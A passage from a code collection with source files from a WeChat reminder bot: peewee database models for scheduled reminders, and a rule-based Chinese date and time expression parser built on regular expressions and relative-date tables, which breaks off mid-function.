idxed_image = crop_image(idxed_image, bin_mask) iter_ans_arr = [] for _ in range(num_iter): iter_res = compare_images(idxed_image, train_image, 0.7) iter_ans_arr.append(iter_res) curr_ans = np.bincount(iter_ans_arr).argmax() text_x, text_y, text_w, text_h = cv2.boundingRect(bin_mask) image = cv2.putText(image, train_answers[curr_ans - 1], (text_x + text_w // 2 - 75, text_y + text_h // 2), cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 255, 255), thickness=10) image = cv2.rectangle(image, (text_x, text_y), (text_x + text_w, text_y + text_h), (255, 255, 255), thickness=8) plt.figure(figsize=(20,20)) plt.imshow(image, cmap='gray') ```
{ "source": "aaashuai/easy_wechat_reminder", "score": 3 }
#### File: aaashuai/easy_wechat_reminder/models.py ```python import time from peewee import SqliteDatabase, Model, CharField, IntegerField, TextField from typevar import JobState db = SqliteDatabase("wxbotv2.db") class TableScheduleJob(Model): id = IntegerField(index=True, primary_key=True, help_text="真实ID") job_id = IntegerField(index=True, help_text="任务ID") room = TextField(index=True, help_text="群聊房间") name = CharField(index=True, help_text="任务名称") start_time = IntegerField(default=lambda: int(time.time()), help_text="开始时间") next_run_time = IntegerField(help_text="下一次执行时间") schedule_info = CharField(null=True, help_text="周期类型或天数") state = IntegerField(default=JobState.ready, choices=JobState, help_text="任务执行状态") remind_msg = TextField(help_text="定时提醒内容") class Meta: database = db class TableScheduleRecord(Model): id = IntegerField(index=True, primary_key=True) job_real_id = IntegerField(index=True, help_text="任务真实ID") remind_msg = TextField(help_text="本次提醒内容") create_time = IntegerField(default=lambda: int(time.time()), help_text="执行时间") class Meta: database = db def create_tables(): with db: db.create_tables([TableScheduleJob, TableScheduleRecord]) create_tables() ``` #### File: ner/dtime/dtime.py ```python import regex as re from datetime import datetime, time from typing import Optional, Dict, Union, Tuple, List, Callable from typing import Any, Text from dateutil.relativedelta import relativedelta from ner import BaseExtractor from ner.models import Datetime from ner.number import number_ext from ner.dtime.date_pattern import YEAR_OPTIONAL_DATE, YEAR __all__ = ("DateObject", "Duration", "ZHDatetimeExtractor", "date_extractor") # Duration除外的日期表达 class DateObject: def __init__( self, now, entity, parse_code, datetime_level, is_discrete, is_range, datetime_type, base_time=None, period=(0, 0, 0, 0), duration=(0, 0, 0, 0), is_week=None, is_specific_time=None, **data, ): """ :param now: :param entity: 提取出的实体,比如"周三" :param parse_code: :param datetime_level: [0,0,0,0,0,0]六位占位符列表,分别对应[年,月,日,时,分,秒],0为该位无值,1为有值 :param is_discrete: [x,x]两位列表,x取值为None,0,1; 其中第一位代表Date,第二位代表Time,非None代表为对应类型,比如[1, 1]代表Datetime类型,且Date和Time处is_discrete都为True :param is_range: 与is_discrete类似 :param datetime_type: :param base_time: :param period: [year, month, day, second] :param duration: [year, month, day, second] :param is_week: :param is_specific_time: :param data: """ self.now = now self.entity = entity self.parse_code = parse_code self.datetime_level = datetime_level self.is_discrete = is_discrete self.is_range = is_range self.datetime_type = datetime_type self.base_time = base_time self.period = list(period) self.duration = list(duration) self.is_week = is_week self.is_specific_time = is_specific_time self.value = None self.nearest = None self.data = data self.parse_dict = { 0: self.parse_input_0, 2: self.parse_input_1, 4: self.adjust_base_to_previous, 5: self.adjust_base_to_previous, 6: self.parse_input_2, 8: self.parse_input_2, 10: self.parse_input_3, 11: self.parse_input_3, 12: self.parse_input_3, 13: self.parse_input_3, 14: self.parse_input_3, 15: self.parse_input_3, 16: self.parse_input_3, 17: self.parse_input_3, 18: self.parse_input_3, 19: self.parse_input_3, 20: self.parse_input_3, 21: self.parse_input_3, 22: self.parse_input_3, 23: self.parse_input_3, 24: self.parse_input_4, 25: self.parse_input_4, 26: self.parse_input_4, 27: self.parse_input_4, 28: self.parse_input_4, 29: self.parse_input_4, 31: self.parse_input_5, 32: self.parse_input_5, 33: self.parse_input_5, 34: self.parse_input_4, 35: self.parse_input_4, 36: self.parse_input_4, 45: self.parse_input_2, } self.relative_date_dict = { "本": 0, "这": 0, "今": 0, "来": 1, "去": -1, "昨": -1, "明": 1, "上": -1, "下": 1, "这1": 0, "上1": -1, "下1": 1, "这个": 0, "上个": -1, "下个": 1, "前个": -1, "后个": 1, "这1个": 0, "上1个": -1, "下1个": 1, "前": -2, "后": 2, "大前": -3, "大后": 3, } self.holiday_dict = { "元旦": (datetime(2018, 1, 1), datetime(2019, 1, 1), datetime(2020, 1, 1)), "除夕": (datetime(2018, 2, 15), datetime(2019, 2, 4), datetime(2020, 1, 24)), "年30": (datetime(2018, 2, 15), datetime(2019, 2, 4), datetime(2020, 1, 24)), "春节": (datetime(2018, 2, 16), datetime(2019, 2, 5), datetime(2020, 1, 25)), "清明": (datetime(2018, 4, 5), datetime(2019, 4, 5), datetime(2020, 4, 5)), "劳动": (datetime(2018, 5, 1), datetime(2019, 5, 1), datetime(2020, 5, 1)), "端午": (datetime(2018, 6, 18), datetime(2019, 6, 7), datetime(2020, 6, 25)), "中秋": (datetime(2018, 9, 24), datetime(2019, 9, 13), datetime(2020, 10, 1)), "国庆": (datetime(2018, 10, 1), datetime(2019, 10, 1), datetime(2020, 10, 1)), "圣诞": ( datetime(2018, 12, 25), datetime(2019, 12, 25), datetime(2020, 12, 25), ), } self.timerange_dict = { "清晨": (4, 4), "黎明": (4, 4), "早上": (6, 6), "早晨": (6, 6), "上午": (6, 6), "晌午": (8, 4), "中午": (11, 2), "午间": (11, 2), "午后": (12, 4), "下午": (12, 4), "黄昏": (16, 4), "傍晚": (16, 4), "晚上": (18, 8), "夜晚": (18, 4), "晚间": (18, 4), "深夜": (20, 4), "凌晨": (0, 6), } self.time_dict = {"正午": 12, "半夜": 0, "午夜": 0} self.datetimerange_dict = { "今早": (6, 6, 0), "今晚": (18, 4, 0), "今夜": (18, 4, 0), "昨晚": (18, 4, -1), "昨夜": (18, 4, -1), "明早": (6, 6, 1), "明晚": (18, 4, 1), } def __repr__(self): return "{}({}, {}, {}, {}, {}, {})".format( self.datetime_type, self.datetime_level, self.is_discrete, self.is_range, self.entity, self.value, self.nearest, ) def __add__(self, other): assert type(other) == DateObject # 如果两个相加对象同为Daterange, Timerange, Datetimerange,则返回None for i in range(2): if self.is_range[i] == 1 and other.is_range[i] == 1: return None fst_lowest, snd_highest = 5, 0 for i in range(5, -1, -1): if self.datetime_level[i]: fst_lowest = i break for i in range(6): if other.datetime_level[i]: snd_highest = i break # timelevel正好相差1位 if ( (snd_highest - fst_lowest == 1) or ( (self.is_week == 1) and (other.parse_code == 27) and (other.is_week == 2) ) or (self.is_specific_time and (snd_highest == 3)) ): if self.is_week is None: if other.is_week: return False else: if self.is_week == 1: if other.is_week is None: return False # TODO 2021年节假日还需修改这里 if other.parse_code == 30: if ( (self.base_time.year != 2018) and (self.base_time.year != 2019) and (self.base_time.year != 2020) ) or (not (self.is_range[0])): return False if self.is_specific_time and not (snd_highest == 3): return False sum_entity = self.entity + other.entity sum_datetime_level = [ a ^ b for (a, b) in zip(self.datetime_level, other.datetime_level) ] if other.parse_code == 27: sum_datetime_level = [0] * 6 if self.is_specific_time: sum_datetime_level[3] = 1 sum_is_discrete = self.add_discrete_range_helper( zip(self.is_discrete, other.is_discrete) ) sum_is_range = self.add_discrete_range_helper( zip(self.is_range, other.is_range) ) sum_period = [0, 0, 0, 0] if sum_is_discrete[0]: sum_period[0:3] = self.period[0:3] if sum_is_discrete[1]: if self.is_discrete[1]: sum_period[3] = self.period[3] else: sum_period[3] = other.period[3] sum_duration = [0, 0, 0, 0] if sum_is_range[0]: sum_duration[0:3] = other.duration[0:3] if sum_is_range[1]: if self.is_range[1]: sum_duration[3] = other.duration[3] else: sum_duration[3] = other.duration[3] sum_datetime_type = self.calculate_datetime_type(sum_is_range) if other.parse_code == 30: sum_base_time = self.holiday_dict[other.entity][ self.base_time.year - 2018 ] else: sum_base_time = self.add_base_time_helper(self.base_time, other) if not sum_base_time: return "Illegal" sum_date_object = DateObject( self.now, sum_entity, -1, sum_datetime_level, sum_is_discrete, sum_is_range, sum_datetime_type, sum_base_time, sum_period, sum_duration, ) if other.is_specific_time: sum_date_object.is_specific_time = 1 if self.parse_code == 30: temp1 = DateObject( self.now, sum_entity, -1, sum_datetime_level, sum_is_discrete, sum_is_range, sum_datetime_type, self.add_base_time_helper(self.value[0], other), sum_period, sum_duration, ) temp2 = DateObject( self.now, sum_entity, -1, sum_datetime_level, sum_is_discrete, sum_is_range, sum_datetime_type, self.add_base_time_helper( self.value[int(len(self.value) / 2)], other ), sum_period, sum_duration, ) temp1.parse_input() temp2.parse_input() sum_date_object.parse_code = 30 if type(temp1.value) == list: sum_date_object.value = temp1.value + temp2.value else: sum_date_object.value = [temp1.value, temp2.value] sum_date_object.calculate_nearest() else: sum_date_object.parse_input() return sum_date_object else: return False @staticmethod def add_discrete_range_helper(zip_list): rtn = [] for (a, b) in zip_list: if (a is None) and (b is None): rtn.append(None) elif a is None: rtn.append(b) elif b is None: rtn.append(a) else: rtn.append(a & b) return rtn def add_base_time_helper(self, base_time, other): sum_base_time = base_time if type(sum_base_time) == dict: sum_base_time = sum_base_time["start"] if other.is_week == 2: if (other.base_time >= base_time) and ( other.base_time < (base_time + relativedelta(weeks=1)) ): sum_base_time = other.base_time elif (other.base_time - relativedelta(weeks=1) >= base_time) and ( other.base_time - relativedelta(weeks=1) < (base_time + relativedelta(weeks=1)) ): sum_base_time = other.base_time - relativedelta(weeks=1) elif (other.base_time + relativedelta(weeks=1) >= base_time) and ( other.base_time + relativedelta(weeks=1) < (base_time + relativedelta(weeks=1)) ): sum_base_time = other.base_time + relativedelta(weeks=1) else: sum_base_time = other.base_time + relativedelta(weeks=2) elif self.is_specific_time: found = False if self.is_range[1]: if "上午" in self.entity: check_start = time(0, 0, 1) check_end = time(12) elif "下午" in self.entity: check_start = time(12, 0, 1) check_end = time(0) else: if type(self.value) == list: check_range = self.value[0] else: check_range = self.value check_start = check_range["start"].time() check_end = check_range["end"].time() if other.is_discrete[1]: for value in other.value: if "晚上" in self.entity: if (value.time() >= check_start) and ( value.time() <= time(23, 59, 59) ): sum_base_time = sum_base_time.replace( hour=value.hour, minute=value.minute ) found = True break elif (value.time() >= time(0)) and ( value.time() <= check_end ): sum_base_time = sum_base_time.replace( day=sum_base_time.day + 1, hour=value.hour, minute=value.minute, ) found = True break else: if (value.time() == time(0)) and (check_end == time(0)): sum_base_time = sum_base_time.replace( day=sum_base_time.day + 1, hour=value.hour, minute=value.minute, ) found = True break elif (value.time() >= check_start) and ( (value.time() <= check_end) or (check_end == time(0)) ): sum_base_time = sum_base_time.replace( hour=value.hour, minute=value.minute ) found = True break else: if "晚上" in self.entity: if (other.value.time() >= check_start) and ( other.value.time() <= time(23, 59, 59) ): sum_base_time = sum_base_time.replace( hour=other.value.hour, minute=other.value.minute ) found = True elif (other.value.time() >= time(0)) and ( other.value.time() <= check_end ): sum_base_time = sum_base_time.replace( day=sum_base_time.day + 1, hour=other.value.hour, minute=other.value.minute, ) found = True else: if (other.value.time() == time(0)) and (check_end == time(0)): sum_base_time = sum_base_time.replace( day=sum_base_time.day + 1, hour=other.value.hour, minute=other.value.minute, ) found = True elif (other.value.time() >= check_start) and ( (other.value.time() <= check_end) or (check_end == time(0)) ): sum_base_time = sum_base_time.replace( hour=other.value.hour, minute=other.value.minute ) found = True if not found: return False else: if type(self.value) == list: check_time = self.value[0].time() else: check_time = self.value.time() for value in other.value: if value.time() == check_time: found = True break if not found: return False else: if other.datetime_level[1]: sum_base_time = sum_base_time.replace(month=other.base_time.month) if other.datetime_level[2]: sum_base_time = sum_base_time.replace(day=other.base_time.day) if other.datetime_level[3]: sum_base_time = sum_base_time.replace(hour=other.base_time.hour) if other.datetime_level[4]: sum_base_time = sum_base_time.replace(minute=other.base_time.minute) if other.datetime_level[5]: sum_base_time = sum_base_time.replace(second=other.base_time.second) return sum_base_time @staticmethod def calculate_datetime_type(is_range): if is_range[1] is None: if is_range[0]: return "DateRange" else: return "Date" else: if is_range[0] is None: if is_range[1]: return "TimeRange" else: return "Time" else: if is_range[1]: return "DatetimeRange" else: return "Datetime" # 调整离散日期的base_time为现在的上一个日期 def adjust_base_to_previous(self): if self.base_time > self.now: self.base_time -= relativedelta( years=self.period[0], months=self.period[1], days=self.period[2], seconds=self.period[3], ) # 类似"(年.)月.日"的处理 def parse_input_0(self): if self.data["year"]: self.base_time = datetime( int(self.data["year"]), int(self.data["month"]), int(self.data["day"]) ) else: self.datetime_level[0] = 0 self.is_discrete[0] = 1 self.period[0] = 1 self.base_time = datetime( self.now.year, int(self.data["month"]), int(self.data["day"]) ) self.adjust_base_to_previous() # 对于中文(一个一个数字)所说年份的处理 def parse_input_1(self): if self.data["year"][0]: self.data["year"] = self.data["year"][0].replace(" ", "") else: self.data["year"] = self.data["year"][1].replace(" ", "") if len(self.data["year"]) == 2: if self.data["year"] >= "50": self.data["year"] = "19" + self.data["year"] else: self.data["year"] = "20" + self.data["year"] self.base_time = datetime(int(self.data["year"]), 1, 1) # 表示特定时刻的处理 def parse_input_2(self): second = 0 if "second" in self.data: if self.data["second"]: second = int(self.data["second"]) if not self.data["minute"]: self.data["minute"] = 0 if not (type(self.data["hour"]) == int): if self.data["hour"][0]: self.data["hour"] = int(self.data["hour"][0]) if self.data["minute"]: minute_dict = {"钟": 0, "整": 0, "1刻": 15, "半": 30, "3刻": 45} self.data["minute"] = minute_dict[self.data["minute"]] else: self.data["hour"] = int(self.data["hour"][1]) if (self.data["hour"] <= 12) and (self.data["hour"] != 0): self.is_discrete[1] = 1 self.period[3] = 3600 * 12 if self.data["hour"] == 12 or self.data["hour"] == 24: self.data["hour"] = 0 self.base_time = self.now.replace( hour=self.data["hour"], minute=self.data["minute"], second=second, microsecond=0, ) # 表示X时刻前/后以及前/后X时刻的处理 def parse_input_3(self): half_delta_dict = { "years": relativedelta(months=6), "months": relativedelta(days=15), "days": relativedelta(hours=12), "hours": relativedelta(minutes=30), "minutes": relativedelta(seconds=30), } if self.data["level"] == "years": if self.data["years"]: delta = relativedelta(years=int(self.data["years"])) if "半" in self.entity: delta += half_delta_dict["years"] else: delta = half_delta_dict["years"] elif self.data["level"] == "months": if self.data["months"]: delta = relativedelta(months=int(self.data["months"])) if "半" in self.entity: delta += half_delta_dict["months"] else: delta = half_delta_dict["months"] elif self.data["level"] == "weeks": delta = relativedelta(weeks=int(self.data["weeks"])) elif self.data["level"] == "days": if self.data["days"]: delta = relativedelta(days=int(self.data["days"])) if "半" in self.entity: delta += half_delta_dict["days"] else: delta = half_delta_dict["days"] elif self.data["level"] == "hours": if self.data["hours"]: delta = relativedelta(hours=int(self.data["hours"])) if "半" in self.entity: delta += half_delta_dict["hours"] else: delta = half_delta_dict["hours"] elif self.data["level"] == "minutes": if self.data["minutes"]: delta = relativedelta(minutes=int(self.data["minutes"])) if "半" in self.entity: delta += half_delta_dict["minutes"] else: if "1刻钟" in self.entity: delta = relativedelta(minutes=15) elif "3刻钟" in self.entity: delta = relativedelta(minutes=45) else: delta = half_delta_dict["minutes"] else: delta = relativedelta(seconds=int(self.data["seconds"])) if (self.entity[-1] == "前") or (self.entity[0] == "前"): self.base_time = (self.now - delta).replace(microsecond=0) elif self.entity[-1] == "后": self.base_time = (self.now + delta).replace(microsecond=0) else: self.base_time = self.now.replace(microsecond=0) if any(self.is_range): self.duration = [ delta.years, delta.months, delta.days, delta.hours * 3600 + delta.minutes * 60 + delta.seconds, ] # 获取本周X日期 def get_weekday_date(self, weekday): weekday -= 1 result_date = self.now while result_date.weekday() != weekday: if result_date.weekday() > weekday: result_date += relativedelta(days=-1) else: result_date += relativedelta(days=1) return datetime(result_date.year, result_date.month, result_date.day) def discrete_week_helper(self): self.datetime_level[0], self.datetime_level[1] = 0, 0 if self.base_time > self.now: self.base_time += relativedelta(weeks=-1) self.is_discrete[0] = 1 self.period[2] = 7 self.is_week = 2 # 表示相对时刻的处理 def parse_input_4(self): # 相对年表达 if self.parse_code == 24: if self.data["relative"][0]: relative_delta = relativedelta( years=self.relative_date_dict[self.data["relative"][0]] ) else: relative_delta = relativedelta( years=self.relative_date_dict[self.data["relative"][1]] ) self.base_time += relative_delta # 相对月表达 elif self.parse_code == 25: self.base_time += relativedelta( months=self.relative_date_dict[self.data["relative"]] ) # 相对周表达 elif self.parse_code == 26: self.base_time = self.get_weekday_date(1) if self.data["relative"][0]: relative_delta = relativedelta( weeks=self.relative_date_dict[self.data["relative"][0]] ) else: relative_delta = relativedelta( weeks=self.relative_date_dict[self.data["relative"][1]] ) self.base_time += relative_delta # 相对周末表达 elif self.parse_code == 27: self.base_time = self.get_weekday_date(6) if self.data["relative"]: self.base_time += relativedelta( weeks=self.relative_date_dict[self.data["relative"]] ) else: self.discrete_week_helper() # 相对周X(具体日期)表达 elif self.parse_code == 28: if (self.data["weekday"] == "天") or (self.data["weekday"] == "日"): self.data["weekday"] = "7" self.base_time = self.get_weekday_date(int(self.data["weekday"])) if self.data["relative"][1]: self.base_time += relativedelta( weeks=self.relative_date_dict[self.data["relative"][1]] ) elif not (self.data["relative"][0]): self.discrete_week_helper() # 相对日表达 elif self.parse_code == 29: self.base_time += relativedelta( days=self.relative_date_dict[self.entity[0:-1]] ) # 相对小时表达 elif self.parse_code == 34: self.base_time += relativedelta( hours=self.relative_date_dict[self.entity[0:-2]] ) # 相对小时表达 elif self.parse_code == 35: self.base_time += relativedelta( minutes=self.relative_date_dict[self.data["relative"]] ) # 相对小时表达 elif self.parse_code == 36: self.base_time += relativedelta( seconds=self.relative_date_dict[self.data["relative"]] ) # 表示一天中特定时间段/点的表达的处理 def parse_input_5(self): if self.parse_code == 32: hour = self.time_dict[self.entity] elif self.parse_code == 31: hour = self.timerange_dict[self.entity][0] self.duration[3] = 3600 * self.timerange_dict[self.entity][1] else: hour = self.datetimerange_dict[self.entity][0] self.duration[3] = 3600 * self.datetimerange_dict[self.entity][1] self.base_time = self.now.replace(hour=hour, minute=0, second=0, microsecond=0) if self.parse_code == 33: self.base_time += relativedelta( days=self.datetimerange_dict[self.entity][2] ) # 解析日期表述,按需要更新base_time, period, 以及duration字段, 计算出具体输出值以及最接近目前时间的值。 def parse_input(self): if self.parse_code == 30: # 假期 self.base_time = self.holiday_dict[self.entity][1] if self.base_time > self.now: self.value = [ self.holiday_dict[self.entity][0], self.holiday_dict[self.entity][1], ] else: self.value = [ self.holiday_dict[self.entity][1], self.holiday_dict[self.entity][2], ] else: if self.parse_code in self.parse_dict: self.parse_dict[self.parse_code]() self.calculate_value() self.calculate_nearest() def calculate_value(self): date_period = relativedelta( years=self.period[0], months=self.period[1], days=self.period[2] ) time_period = relativedelta(seconds=self.period[3]) duration = relativedelta( years=self.duration[0], months=self.duration[1], days=self.duration[2], seconds=self.duration[3], ) if any(self.period): if any(self.duration): self.value = [ {"start": self.base_time, "end": self.base_time + duration}, { "start": self.base_time + date_period, "end": self.base_time + date_period + duration, }, ] else: if any(self.period[0:3]) and self.period[3]: self.value = [ self.base_time, self.base_time + time_period, self.base_time + date_period, self.base_time + date_period + time_period, ] elif self.period[3]: self.value = [self.base_time, self.base_time + time_period] else: self.value = [self.base_time, self.base_time + date_period] else: if any(self.duration): self.value = {"start": self.base_time, "end": self.base_time + duration} else: self.value = self.base_time def calculate_nearest(self): if type(self.value) == list: if type(self.value[0]) == dict: min_delta = abs(self.now - self.value[0]["start"]) else: min_delta = abs(self.now - self.value[0]) self.nearest = self.value[0] for i in range(1, len(self.value)): if type(self.value[i]) == dict: temp = abs(self.now - self.value[i]["start"]) else: temp = abs(self.now - self.value[i]) if temp <= min_delta: min_delta, self.nearest = temp, self.value[i] else: self.nearest = self.value class Duration: def __init__(self, entity, parse_code, length): self.entity = entity self.parse_code = parse_code self.type = "Duration" self.length = length self.value = None self.duration_dict = { 38: 31536000, 39: 2592000, 40: 604800, 41: 86400, 42: 3600, 43: 60, 44: 1, } def __repr__(self): return "{}({}, {}s)".format(self.type, self.entity, self.value) # 对于带"半"的时间长度的处理 def half_duration_helper(self, duration_unit): if "年" in self.entity: return self.duration_dict[39] * 6 else: return int(0.5 * duration_unit) def parse_input(self): duration_unit = self.duration_dict[self.parse_code] half_offset = 0 if self.length: value = int(self.length) if "半" in self.entity: half_offset = self.half_duration_helper(duration_unit) self.value = value * duration_unit + half_offset elif "1刻钟" == self.entity: self.value = 15 * 60 elif "3刻钟" == self.entity: self.value = 45 * 60 else: self.value = self.half_duration_helper(duration_unit) def remove_inclusion(r): r = sorted(r, key=lambda x: (x[1], x[2])) if len(r) > 1: fst = 0 snd = 1 while snd < len(r): # 重复匹配到的字串a,b,起点相同,比较终点,终点小的被舍弃 if (r[fst][1] == r[snd][1]) and (r[fst][2] <= r[snd][2]): r.remove(r[fst]) # 起止index有交叉的字串,取起始更小的字串,remove起始较大的字串 elif (r[fst][1] < r[snd][1]) and (r[fst][2] > r[snd][1]): r.remove(r[snd]) else: fst += 1 snd += 1 return r def get_type( is_date_range: Optional[int], is_time_range: Optional[int] ) -> Tuple[Optional[str], bool]: if is_date_range == 0 and is_time_range is None: rtn, is_range = "date", False elif is_date_range == 1 and is_time_range is None: rtn, is_range = "date", True elif is_date_range is None and is_time_range == 0: rtn, is_range = "time", False elif is_date_range is None and is_time_range == 1: rtn, is_range = "time", True elif is_date_range == 0 and is_time_range == 0: rtn, is_range = "datetime", False elif is_date_range is not None and is_time_range == 1: rtn, is_range = "datetime", True else: rtn, is_range = None, False return rtn, is_range def get_datetime_value(data: Union[Dict, datetime]) -> Tuple[datetime, Optional[int]]: if isinstance(data, dict): value = data["start"] delta = int((data["end"] - value).total_seconds()) else: value = data delta = None return value, delta class ZHDatetimeExtractor(BaseExtractor): def __init__(self, now_func: Callable = None): if now_func is None: now_func = datetime.now self.patterns = { # 类似"(年.)月.日"的识别 re.compile(YEAR_OPTIONAL_DATE): 0, # 类似"年.月"的识别 re.compile(r"(?<!\d)((?:19|20)\d{2})[-./](1[012]|0?[1-9])(?!\d)"): 1, # 对于中文(一个一个数字)所说年份的识别,主要针对数字识别模块识别类似二零二零年为2 0 2 0年的问题 re.compile(r"((?:1\s9|2\s0)(?:\s\d){2})年?|(\d\s\d)年"): 2, # 四位阿拉伯数字表示"XXXX年"的识别 re.compile(f"{YEAR}(?:年)"): 3, # 表示"XX月"的识别 re.compile(r"(1[012]|[1-9])月"): 4, # 表示"XX日"的识别 # re.compile(r"(?<!月)(3[01]|[1-2]\d|(?<!\d)[1-9])[日号]"): 5, re.compile(r"(3[01]|[1-2]\d|(?<!\d)[1-9])[日号]"): 5, # 表示特定时刻的识别 re.compile(r"(2[0-4]|1\d|\d)点(钟|1刻|3刻|半|整)?|(2[0-4]|1\d|\d)时"): 6, # 表示特定分钟的识别 re.compile(r"([1-5]\d|0?\s?\d)分"): 7, # 表示X点X(分)的识别 re.compile(r"(2[0-4]|1\d|\d)[点时]([1-5]\d|0?\s?\d)分?"): 8, # 表示特定秒钟的识别 re.compile(r"(0\s?\d|[1-5]\d)秒"): 9, # 表示"X年前/后"(时间点)的识别 re.compile(r"(?:([1-9]\d*)年半?|半年)[前后]"): 10, # 表示"X个月前/后"(时间点)的识别 re.compile(r"(?:([1-9]\d*)个半?月|半个月)[前后]"): 11, # 表示"X周前/后"(时间点)的识别 re.compile(r"([1-9]\d*)(?:个?星期|个?礼拜|周)[前后]"): 12, # 表示"X天前/后"(时间点)的识别 re.compile(r"(?:([1-9]\d*)[天日]半?|半[天日])[前后]"): 13, # 表示"X小时前/后"(时间点)的识别 re.compile(r"(?:([1-9]\d*)(?:小时|个半?小时|个半?钟头)|半个?小时|半个钟头)[前后]"): 14, # 表示"X分钟前/后"(时间点)的识别 re.compile(r"(?:([1-9]\d*)(?:分半钟?|分钟)|半分钟|[13]刻钟)[前后]"): 15, # 表示"X秒前/后"(时间点)的识别 re.compile(r"([1-9]\d*)秒钟?[前后]"): 16, # 表示"前/后X年"(时间段)的识别 re.compile(r"[前后](?:([1-9]\d*)年半?|半年)"): 17, # 表示"前/后X个月"(时间段)的识别 re.compile(r"[前后](?:([1-9]\d*)个半?月|半个月)"): 18, # 表示"前/后X周"(时间段)的识别 re.compile(r"[前后]([1-9]\d*)(?:个?星期|个?礼拜|周)"): 19, # 表示"前/后X天"(时间段)的识别 re.compile(r"[前后](?:([1-9]\d*)[天日]半?|半[天日])"): 20, # 表示"前/后X小时"(时间段)的识别 re.compile(r"[前后](?:([1-9]\d*)(?:小时|个半?小时|个半?钟头)|半个?小时|半个钟头)"): 21, # 表示"前/后X分钟"(时间段)的识别 re.compile(r"[前后](?:([1-9]\d*)(?:分半钟?|分钟)|半分钟|[13]刻钟)"): 22, # 表示"前/后X秒"(时间段)的识别 re.compile(r"[前后]([1-9]\d*)秒钟?"): 23, # 表示年级日期的相对表达的识别 re.compile( r"(本|上1|下1|今|去|明|前|后|来|大前|大后)年|(本|这1|这1?个|上1|下1|上1?个|下1?个)年度" ): 24, # 表示月级日期的相对表达的识别 re.compile(r"(本|上|下|这1?个|上1?个|下1?个)月"): 25, # 表示周级日期的相对表达的识别 re.compile( r"(本|这1?|上1?|下1?|这1?个|上1?个|下1?个)(?:星期|周)|(这1?|上1?|下1?|这1?个|上1?个|下1?个|前个|后个)礼拜" ): 26, # 表示周末时间段的相对表达的识别 re.compile(r"(本|这1?|上1?|下1?|这1?个|上1?个|下1?个)?周末"): 27, # 表示星期X的相对表达的识别 re.compile(r"(?:(本周)|(这个?|上个?|下个?)?(?:星期|礼拜|周))([123456天日])"): 28, # 表示天级日期的相对表达的识别 re.compile(r"(?:今|昨|明|前|后|大前|大后)天|[本今昨明]日"): 29, # 表示一年中特定日期段的表达的识别 re.compile(r"元旦|除夕|年30|春节|端午|国庆|中秋|劳动|圣诞|清明"): 30, # 表示一天中特定时间段的表达的识别 re.compile(r"清晨|黎明|早上|早晨|上午|晌午|中午|午间|午后|下午|黄昏|晚上|夜晚|晚间|傍晚|深夜|凌晨"): 31, # 表示一天中特定时间点的表达的识别 re.compile(r"正午|半夜|午夜"): 32, # 天级日期和特定时间段在一起时的缩写表达的识别 re.compile(r"今早|今晚|今夜|昨晚|昨夜|明早|明晚"): 33, # 表示小时级时间的相对表达的识别 re.compile(r"(?:这1|上1|下1|这1?个|上1?个|下1?个)小时|(?:这1?个|上1?个|下1?个)钟头"): 34, # 表示分钟级时间的相对表达的识别 re.compile(r"(这1|上1|下1)分钟"): 35, # 表示秒钟级时间的相对表达的识别 re.compile(r"(这1|上1|下1)秒钟?"): 36, # 表示"现在"的表达的识别 re.compile(r"现在|当下|刚刚|此时此刻|此时|此刻|目前|当前|今时"): 37, # 表示"X年"(时间长度)的处理 re.compile(r"([1-9]\d{0,2}|[1-9]\d{4,}|1[0-8]\d{2}|2[1-9]\d{2})年半?|半年"): 38, # 表示"X个月"(时间长度)的处理 re.compile(r"([1-9]\d*)个半?月|半个月"): 39, # 表示"X周"(时间长度)的处理 re.compile(r"([1-9]\d*)(?:个?星期|个?礼拜|周)"): 40, # 表示"X天"(时间长度)的处理 re.compile(r"([1-9]\d*)[天日]半?|半[天日]"): 41, # 表达"X小时"(时间长度)的表达 re.compile(r"(?:([1-9]\d*)(?:小时|个半?小时|个半?钟头)|半个?小时|半个钟头)"): 42, # 表达"X分钟"(时间长度)的表达 re.compile(r"([1-9]\d*)分[钟半]|[13]刻钟|半分钟"): 43, # 表达"X秒钟"(时间长度)的表达 re.compile(r"([1-9]\d*)秒钟?"): 44, # 形如XX:XX:XX的表达(表示时间)的识别 re.compile(r"(2[0-4]|1\d|\d)[::](0\d|[1-5]\d)(?:[::](0\d|[1-5]\d))?"): 45, # 表达"xx月xx" re.compile(r"([2-9]|1[0-2]?)月(3[01]|[1-2]\d|[1-9])[日]?"): 46, } self.now_func = now_func def parse(self, text: Text, *args: Any) -> List[Datetime]: # s_arabic_without_dot: 中文数字转换为阿拉伯数字 (不替换"点") ( s_arabic_without_dot, replacement_relationship_without_dot, space_index, ) = number_ext.parse_datetime_num(text) # 当前时间 now = self.now_func() # 识别结果 r = [] durations = [] # 去掉空格 # s_arabic_without_dot = s_arabic_without_dot.replace(" ", "") for (pattern, parse_code) in self.patterns.items(): matches = pattern.finditer(s_arabic_without_dot) for match in matches: if parse_code == 0: date_res = match.group(0) year = match.group("year") month = match.group("month") day = match.group("day") r.append( ( DateObject( now, date_res, parse_code, [1, 1, 1, 0, 0, 0], [0, None], [0, None], "Date", year=year, month=month, day=day, ), match.start(), match.end(), ) ) elif parse_code == 1: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 0, 0, 0, 0], [0, None], [1, None], "DateRange", datetime(int(match.group(1)), int(match.group(2)), 1), duration=(0, 1, 0, 0), ), match.start(), match.end(), ) ) elif parse_code == 2: r.append( ( DateObject( now, match.group(0), parse_code, [1, 0, 0, 0, 0, 0], [0, None], [1, None], "DateRange", duration=(1, 0, 0, 0), year=(match.group(1), match.group(2)), ), match.start(), match.end(), ) ) elif parse_code == 3: r.append( ( DateObject( now, match.group(0), parse_code, [1, 0, 0, 0, 0, 0], [0, None], [1, None], "DateRange", datetime(int(match.group("year")), 1, 1), duration=(1, 0, 0, 0), ), match.start(), match.end(), ) ) elif parse_code == 4: r.append( ( DateObject( now, match.group(0), parse_code, [0, 1, 0, 0, 0, 0], [1, None], [1, None], "DateRange", datetime(now.year, int(match.group(1)), 1), (1, 0, 0, 0), (0, 1, 0, 0), ), match.start(), match.end(), ) ) elif parse_code == 5: # 针对类似31号的问题,这里如果日期超过当月最大日,需要减少月份 period = (0, 1, 0, 0) try: base_time = datetime(now.year, now.month, int(match.group(1))) except ValueError as e: if e.args[0] == "day is out of range for month": # 报错出在小月,而每个小月前后都是大月 base_time = datetime( now.year, now.month - 1, int(match.group(1)) ) period = (0, 2, 0, 0) else: raise r.append( ( DateObject( now, match.group(0), 